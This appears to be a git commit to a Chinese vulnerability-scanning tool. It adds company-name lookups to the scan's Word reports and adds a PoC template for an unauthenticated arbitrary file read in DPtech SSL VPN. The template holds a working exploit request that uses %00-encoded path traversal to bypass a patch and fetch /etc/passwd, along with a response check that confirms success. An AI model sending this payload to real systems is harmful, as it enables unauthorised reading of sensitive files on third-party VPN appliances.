优化

2024-10-12 13:35:03 +08:00 · 2024-10-12 13:35:03 +08:00 · 73647db414
commit 73647db414
parent 2b6d13a590
2 changed files with 34 additions and 2 deletions
--- a/new_poc_tools.py
+++ b/new_poc_tools.py
@ -112,13 +112,16 @@ def extract_root_domain(url):
 def add_scan_results_to_document(document, domain, results, include_all, description, choice_3):
    for name, result, status_code, url, res_time in results:
        if include_all or result == "存在漏洞":
+            company_name = get_company_name("https://whois.west.cn/icp/" + extract_root_domain(domain))
            document.add_heading(f"目标：{domain}", level=3)
            document.add_paragraph(f"漏洞名称：{name}")
+            document.add_paragraph(f"公司名称：{company_name}")
            document.add_paragraph(f"漏洞链接：{url}")
-            document.add_paragraph(f"响应状态码：{status_code}")
+            document.add_paragraph(f"响应状态：{status_code}")
            document.add_paragraph(f"响应时间：{res_time}")
            document.add_paragraph(f"漏洞情况：{result}")
            document.add_paragraph("\n")
+            
            if result == "存在漏洞" and choice_3 == "y":
                screenshot_path_1 = screenshot(url)
                # print(screenshot_path_1)
@ -147,7 +150,7 @@ def add_scan_results_to_document(document, domain, results, include_all, descrip
                if not os.path.exists(doc_save_path):
                    os.mkdir(doc_save_path)
                #保存word，根据需要自行更改
-                company_name = get_company_name("https://whois.west.cn/icp/" + extract_root_domain(domain))
+                
                doc_name = str(company_name) + "_" + name + ".docx"
                doc.save(doc_save_path + doc_name)

--- a/poc/SE-Poc/DPsslvpn-ReadFile.yaml
+++ b/poc/SE-Poc/DPsslvpn-ReadFile.yaml
@ -0,0 +1,29 @@
+keyword: DPtech SSLVPN
+name: 迪普SSL VPN 任意文件读取
+description: | # 下一行可填写漏洞描述
+  迪普SSL VPN 存在任意文件读取漏洞，未经身份验证攻击者可通过%00绕过补丁安全校验机制，读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
+requests: # 为空代表默认或者不启用
+  path: "/.%00.%2F.%00.%2F.%00.%2F.%00.%2F.%00.%2F.%00.%2F.%00.%2Fetc%2Fpasswd"
+  method: GET
+  headers:
+    Accept: '*/*'
+    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8
+    Referer: https://www.baidu.com
+    Accept-Encoding: gzip, deflate
+    Connection: keep-alive
+  body-raw: |- # 如果需要发送请求体，在下一行开始填写
+    
+
+response: 
+  path: "" # 不填则默认接收此请求的响应包
+  status-code: 200
+  body: "root"  # 此处可填写响应体中确认漏洞存在的关键字或者其他信息
+  time:     # 此处填写响应包响应时间，默认不启用
+  headers:
+    Server: 
+    Content-type: 
+    Content-length: 
+    Date: 
+    Connection: 
+impact: | # 下一行可填写漏洞影响
+  迪普SSL VPN 存在任意文件读取漏洞，未经身份验证攻击者可通过%00绕过补丁安全校验机制，读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。